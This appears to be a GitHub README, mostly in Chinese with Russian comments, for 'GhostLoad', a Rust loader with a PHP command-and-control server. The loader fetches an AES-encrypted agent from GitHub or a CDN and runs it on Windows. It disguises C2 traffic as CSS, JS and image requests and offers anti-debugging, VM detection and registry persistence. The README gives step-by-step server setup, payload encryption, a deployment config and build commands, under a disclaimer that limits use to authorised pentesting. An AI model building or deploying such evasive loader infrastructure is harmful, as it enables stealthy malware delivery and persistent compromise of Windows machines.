FodiYes/GhostLoad

# RustLoad 用于进行授权渗透测试时交付和安全的代理启动的框架。由 Rust（客户端）和 PHP（服务器）编写。客户端和服务器之间的流量伪装成静态资源（CSS/JS/图像），代理使用 AES-256-GCM 加密。 ## ⚠️ 免责声明 本工具**仅限以下用途**： - 授权渗透测试 - 信息安全研究 - CTF 比赛 - 教育目的 作者**不承担**任何未经明确书面许可的业主系统使用本工具的责任。未经授权的使用可能违反您所在国家的法律。 ## 特点 - **Rust 客户端** — 编译为单个 .exe 文件，无依赖项，Windows x64 - **PHP 服务器** — 在任何 PHP 8.0+ 的主机上运行，已在免费主机上测试 - **流量加密** — 请求/响应伪装成 JPEG/CSS/JS - **AES-256-GCM** — 代理加密，密钥通过 HKDF 输出 - **HMAC-SHA256** 每个请求的认证（防止重放攻击） - **反调试** — 检测调试器、硬件断点、虚拟环境 - **持久性** — 可选，通过 Windows 注册表 ## 结构 ``` ├── backend/ # PHP C2-сервер │ ├── config/ │ │ ├── .env.example # Шаблон конфига (скопируй в .env) │ │ └── deployments.php # Список агентов │ ├── core/ # Логика: крипто, безопасность, логи │ └── public/ │ └── api.php # Точка входа │ ├── loader/ # Rust клиент │ └── src/ │ ├── configs/ │ └── deployment.toml.example # Шаблон конфига клиента (скопируй в deployment.toml) │ └── tools/ └── encrypt_payload.py # Шифрование агентов перед деплоем ``` ## 要求 | 组件 | 要求 | |-----------|-----------| | PHP（服务器） | 8.0+, 扩展：`openssl`, `hash`, `json` | | Rust（客户端构建） | stable, [rustup.rs](https://rustup.rs) | | Windows SDK | 用于 winapi（构建时需要） | | Python | 3.8+, 包 `cryptography` | | 目标操作系统 | Windows 10/11 x64 | ## 安装和配置 ### 1. 后端 ``` cp backend/config/.env.example backend/config/.env # 打开 .env 并填写 SECRET_KEY 和 MASTER_KEY # 生成密钥：python -c "import secrets; print(secrets.token_hex(32))" ``` 将 `backend/` 文件夹上传到主机。检查 `api.php` 是否按 URL 响应。 ### 2. 加密代理 ``` pip install cryptography # Windows set MASTER_KEY=ключ_из_.env python tools/encrypt_payload.py agent.exe agent.enc --profile my_profile --name agent # Linux/Mac MASTER_KEY=ключ_из_.env python tools/encrypt_payload.py agent.exe agent.enc --profile my_profile --name agent ``` 脚本将输出 SHA256 和用于 `deployments.php` 的准备好的块。 ### 3. 配置 deployments.php ``` return [ 'my_profile' => [ [ 'name' => 'agent', 'url' => 'https://github.com/user/repo/releases/download/v1/agent.enc', 'sha256' => 'хэш_из_скрипта', 'target' => '%APPDATA%\\Client\\agent.exe', 'run' => true, 'elevated' => false ], ], ]; ``` ### 4. 构建客户端 ``` cp configs/deployment.toml.example configs/deployment.toml # 填写 api_url、profile、api_secret cd loader cargo build --release # 已编译的二进制文件：loader/target/release/loader.exe ``` ## 工作原理 ``` client.exe ├─ антиотладка / детект VM (опционально) ├─ персистенс (опционально) └─ POST /api.php?f=css ← выглядит как CSS-запрос │ HMAC-подпись ▼ PHP сервер │ проверяет подпись + rate limit │ выдаёт ключ: HKDF(master_key, profile|name) ▼ клиент качает .enc с CDN/GitHub └─ AES-256-GCM расшифровка → запуск ``` ## 注意事项 - 在虚拟机上进行测试时，检测将触发并关闭客户端 — 在 `main.rs` 中注释掉 `anti_analysis::enforce` - `elevated: true` 将触发 UAC 提示（Windows 系统对话框，不可隐藏） - 更改 `MASTER_KEY` 将使所有之前加密的文件失效 - 如果出现问题 — 在 `main.rs` 中取消注释 `dbg_log`，日志将写入 `%TEMP%\dbg.txt` ## 许可证 MIT — 自由使用，风险自担。

标签：AES-256-GCM, DOM解析, HMAC-SHA256, meg, OpenVAS, PHP, Rust, TLS抓取, 信息安全, 加密传输, 加密通信, 反调试, 可视化界面, 安全测试, 攻击性安全, 教育工具, 网络流量审计, 软件安全, 通知系统, 静态资源伪装